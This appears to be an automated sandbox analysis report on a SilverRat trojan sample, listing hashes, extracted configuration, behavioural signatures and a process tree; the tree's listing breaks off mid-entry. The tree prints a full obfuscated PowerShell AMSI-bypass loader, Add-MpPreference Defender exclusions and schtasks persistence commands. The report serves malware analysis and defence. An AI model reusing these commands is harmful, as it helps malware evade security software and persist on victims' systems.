Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-11-2024 02:21

General

  • Target

    ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe

  • Size

    8KB

  • MD5

    e618f84aafa47620606982c4abbc7d67

  • SHA1

    6f6e1f34130d3468da33ce0cadebddfce494255b

  • SHA256

    ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747

  • SHA512

    a5de82399c37e6441edbca72899588c5cbf5574968a81a2a4fe02aa5101a51a4c7b07219c92f10255005f2c8fe6abb66e1d493942e7757b6dfd0c318eb01b704

  • SSDEEP

    96:zdXT3QNm17yCqN1BN3CyvI35R0k7+AmRuPKuHVlXxdbyIzNt:xrX7yCqDyyvYv+Am4PHVlXnyK

Malware Config

Extracted

Family

silverrat

Version

1.0.0.0

Mutex

SilverMutex_GAZUkcCGjo

Attributes
  • certificate

    MIIE4DCCAsigAwIBAgIQAKQYOfZd86J2BfNjhG4CWTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZTaWx2ZXIwIBcNMjIwODI2MTkwMTA4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlNpbHZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPbpOWfhZTuOfEaqqImTTe5dNHAAry7/mf00DCoI4lPZfypsc1tYraxSPFeayGu09a3qdhkWKSVIgwnu2n4GLQNOCY9fh/1oyrX4Iir3BIkYeU7pKTWgjhUlAmFAUAaNr0ca23Ku2kN79jrDzRznOgE2DEW4p7OiM4Mb097ma9lzu7MyssHbY4VCteAhj9HZiplqBxaC1vXDmzxqG+gUZ1aLcyG7ssdkOjtWVBgT3gD/gOl7KchRzCFB1egDC/vD9WZCG35U3Ngi+IkTznoXR1R06cq4v0UnGjE37R2vcB21qb0ZYNiZJXZHv5i9+R7xoPeNoLda5PqnfGGbhPvNEdD56mdcOKlzGIuyemLkUo8texdpiBWKbtc3JZf5VsKxjJtHDK3xW6gDGI+PAirzGkFPmwcf8WgsblvzLg8OZpVxVs8rmKWoi6qIrf4CXnyl73J4lgzW+ir7PjANAQXwLNGdNnvdMeLeo/muGQPdeNpr6OczGGnkWA4qniHeL51/Gx0a8A+jP9zKiyu+qHcsP2IotgWDH/KlzJVr7IAum+DV92uV8poTDcUNcHaKvhHA65KmEtsvLbK6lFZcAMC0eWC0VgpW44T1/16rOaaky5mP6rTMc3nSyOl/lU/XgAgGGQPe22bRLWYzd3WVeEpI1WnHYXS+tL9IOe4kJP+pYsWDAgMBAAGjMjAwMB0GA1UdDgQWBBR32TJj2LeUx9L+RcSOvmFV6VJq6TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+qucSOi7ov7Q1FmAjMf925KuvKuCNwJiu3Sqo3FDGVAD1fAwAi2FdyuXEO2VIUPZCkalFcBna5rqyrc6tcS4T0IL2TsYLrsuGir7PWP7CAcft1urYS1HpNpHxeH/nixwnQaQs/MuRmdm2TeCj6G21P5BTW55U5y9sMPSYwhbD2N7XLgnSQd5Y+80TR7FUiye/k3D37fI9PRhSQGbfYFRQQTmxj84dPTnY5CVgaY9d8fNiFZkyjaZdf+mibK0xQTf+xLVVj+toDNCkc1F462TdmFhCrHd4PoMo0yLDNv4SC6NLRq4haWDRtORw6gd5GYIoCQ3m3oQvNlNxXhhIjsOyxkxOrkCD0c+57PIc7EmKXieJa/XxnkcIVxO8dvTY/vijuz/VaZYl/lPu9ckuqgJ1wRvvsHl70Trv4Mn4X5uCIqRFFlK/mSOZbLIguGkDN3QIZABvej89vlZMhrVfZOG2oawe23FskHjv7thF/WzOXtWw6RUVC1V+hCwbuxFNUjZmmOTUwdXHnus7I2AuiG6Jz1+y9aYiXBcVTdSljxjHRRmiRaAnY94h58vN8NJ4hKL2GVCo6LxkpuplmcntJN0cKraKTPxSXcCRrqWxX9qoIbfvBcUU4vH1jPJCCLNCuDyD3lgQkpPVvq0EMU1a2HFGgMEQMjpYpb38rcadDhT5ag==

  • decrypted_key

    -|S.S.S|-

  • key

    yy6zDjAUmbB09pKvo5Hhug==

  • key_x509

    c0pTT0F4YUlWdnprRUZXU0lZck5EUEdMcFJ1UnpG

  • reconnect_delay

    4

  • server_signature

    N+iIgSoPCcWhCD0PCuU1EnqdssSySClpb5jHn0rlzcGXjOiC8ogxjV2ydCOO+ArBSp8RSv40oajf12v1vhqfmk2ilGPMWjEbqLvPDU2LMgihDzwv3ZfuA6mP2Aa/Unj1blMMQJIfhkDRZ8Y/8D4k3yCrzjkQpVL/lzoytAKaxhscaFQWcUzMysFWdzTOXj3EGXxOUftnKNoeefKDUkkgsOkR8CtSM/hj7iXHgsq5nnhloGeE1zAP9Sfk3YWSl/FkqV9JxjUEiN3eZX9csVjzZ53RP9RqcnALfPHrx/g9CYTRlm4W+e3cO3hGznYJCYZMSkqmPmRpJrecIcL9gkIvfUtbr5vyN9G26VEJDcKUe0URP7GL6HSw+qZ3Mgtb64YVV9GPP/kFtBxewsjmF6szDIlCmHGihNo5kT50Aqxzsv3Vhks9p5hZpt2fvOlKHwYlu+kg9RYn/90wIP28qUbfInnbw4zOcEuhgu9YnApx380zyAJg7tD2dts5W/vcyRBrnIXtJlGVeFEh8pQQI7Mr9esuQkX6GmMcWGX+lB244AgTEf3lKcC0ADB3UiLdGy7HwB4X2cUqvuyXJQicFfuf+wMMh3Q9Ocg+AG696zSjFSZdGbA722nbixPfZWlp0l1z0GF7ntSbelpa67RgjQQc6PlepRIlylqCjTg/EASPPvE=

Signatures

  • SilverRat

    SilverRat is trojan written in C#.

  • Silverrat family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Drops file in System32 directory 18 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 63 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:384
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{f96f35a3-eb65-4cdc-ae52-81085a6a48f6}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1992
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:668
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:964
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:512
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:724
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                • Drops file in System32 directory
                PID:1052
                • C:\Windows\system32\taskhostw.exe
                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                  2⤵
                    PID:2984
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HUkTTCrMpPRQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TaRDednpCXVIWZ,[Parameter(Position=1)][Type]$HZxeagLtqz)$zaglKlrGWZZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+'D'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+'du'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'ate'+[Char](84)+'y'+'p'+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+''+[Char](101)+''+'a'+'l'+'e'+''+[Char](100)+',A'+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$zaglKlrGWZZ.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+'eci'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TaRDednpCXVIWZ).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+'i'+'me'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$zaglKlrGWZZ.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+'ok'+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+[Char](121)+'S'+[Char](105)+'g'+','+'N'+[Char](101)+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$HZxeagLtqz,$TaRDednpCXVIWZ).SetImplementationFlags('Ru'+[Char](110)+'ti'+[Char](109)+''+[Char](101)+''+','+'M'+'a'+''+[Char](110)+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $zaglKlrGWZZ.CreateType();}$mOkECyansmghy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+''+'o'+''+'s'+'o'+'f'+'t'+'.'+''+'W'+'i'+'n'+'32'+[Char](46)+''+'U'+''+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+'e'+''+'N'+''+[Char](97)+''+[Char](116)+'i'+'v'+''+'e'+''+'M'+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$dkKpfqLVEDqHAg=$mOkECyansmghy.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+'ddr'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+'t'+'a'+''+'t'+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dreUiNknXNAzzXArjbe=HUkTTCrMpPRQ @([String])([IntPtr]);$kExKzpJFCCBhVNcJxVSswP=HUkTTCrMpPRQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wPestcycRcC=$mOkECyansmghy.GetMethod('Ge'+'t'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+''+'e'+''+[Char](108)+''+'3'+''+[Char](50)+''+'.'+''+[Char](100)+'l'+[Char](108)+'')));$fEAxLgqJZxzHTN=$dkKpfqLVEDqHAg.Invoke($Null,@([Object]$wPestcycRcC,[Object](''+[Char](76)+''+[Char](111)+'adL'+[Char](105)+''+'b'+''+[Char](114)+''+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$chogbGlfdYVFMMsjJ=$dkKpfqLVEDqHAg.Invoke($Null,@([Object]$wPestcycRcC,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+'r'+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+'t')));$mRtEVlq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fEAxLgqJZxzHTN,$dreUiNknXNAzzXArjbe).Invoke('a'+'m'+'s'+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$MrbjCvqwKaCSzmckI=$dkKpfqLVEDqHAg.Invoke($Null,@([Object]$mRtEVlq,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+'n'+'B'+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+'r'+'')));$mvthIoxNUJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($chogbGlfdYVFMMsjJ,$kExKzpJFCCBhVNcJxVSswP).Invoke($MrbjCvqwKaCSzmckI,[uint32]8,4,[ref]$mvthIoxNUJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MrbjCvqwKaCSzmckI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($chogbGlfdYVFMMsjJ,$kExKzpJFCCBhVNcJxVSswP).Invoke($MrbjCvqwKaCSzmckI,[uint32]8,0x20,[ref]$mvthIoxNUJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+'T'+'WA'+[Char](82)+''+'E'+'').GetValue(''+[Char](115)+''+[Char](118)+''+[Char](115)+''+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                    2⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • Suspicious use of SetThreadContext
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:2928
                    • C:\Windows\System32\Conhost.exe
                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      3⤵
                        PID:3692
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    1⤵
                      PID:1064
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                      1⤵
                        PID:1080
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1188
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                          1⤵
                            PID:1236
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1248
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                              1⤵
                                PID:1332
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1348
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                  1⤵
                                    PID:1404
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1428
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2808
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1528
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          1⤵
                                            PID:1544
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1604
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                              1⤵
                                                PID:1664
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                1⤵
                                                  PID:1720
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1776
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:1884
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:2000
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:2032
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                          1⤵
                                                            PID:1132
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:1716
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2132
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                1⤵
                                                                  PID:2152
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2356
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2364
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2372
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2480
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2544
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2564
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2580
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2588
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:2864
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3068
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:1048
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                  1⤵
                                                                                    PID:3332
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                      PID:3416
                                                                                      • C:\Users\Admin\AppData\Local\Temp\ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe"
                                                                                        2⤵
                                                                                        • Checks computer location settings
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4860
                                                                                        • C:\Users\Public\svClient.exe
                                                                                          "C:\Users\Public\svClient.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Adds Run key to start application
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2424
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFD4C.tmp.bat""
                                                                                            4⤵
                                                                                              PID:3160
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                5⤵
                                                                                                  PID:2604
                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                  timeout 3
                                                                                                  5⤵
                                                                                                  • Delays execution with timeout.exe
                                                                                                  PID:2496
                                                                                                • C:\Users\Admin\svClient\svClient.exe
                                                                                                  "C:\Users\Admin\svClient\svClient.exe"
                                                                                                  5⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:4380
                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                    "schtasks.exe" /query /TN svClient.exe
                                                                                                    6⤵
                                                                                                      PID:5056
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        7⤵
                                                                                                          PID:4484
                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                        "schtasks.exe" /Create /SC ONCE /TN "svClient.exe" /TR "C:\Users\Admin\svClient\svClient.exe \"\svClient.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
                                                                                                        6⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:4428
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          7⤵
                                                                                                            PID:2700
                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                          "schtasks.exe" /query /TN svClient.exe
                                                                                                          6⤵
                                                                                                            PID:2832
                                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                                            "C:\Windows\System32\schtasks.exe" /create /sc hourly /mo 1 /tn "svClient_Task-HOURLY-01" /tr "%MyFile%" /st 00:00
                                                                                                            6⤵
                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                            PID:1980
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              7⤵
                                                                                                                PID:3608
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Public\svClient.exe'
                                                                                                        3⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4524
                                                                                                      • C:\Users\Public\sv.exe
                                                                                                        "C:\Users\Public\sv.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1444
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Public\sv.exe'
                                                                                                        3⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4572
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                    1⤵
                                                                                                      PID:3564
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                        PID:3752
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:3908
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:4176
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                            1⤵
                                                                                                              PID:3728
                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                              1⤵
                                                                                                                PID:4104
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                1⤵
                                                                                                                  PID:404
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                  1⤵
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:5088
                                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:3596
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                    1⤵
                                                                                                                      PID:3440
                                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                      1⤵
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      PID:3544
                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                      1⤵
                                                                                                                        PID:4736
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                        1⤵
                                                                                                                          PID:4660
                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:2612
                                                                                                                          • C:\Windows\System32\WaaSMedicAgent.exe
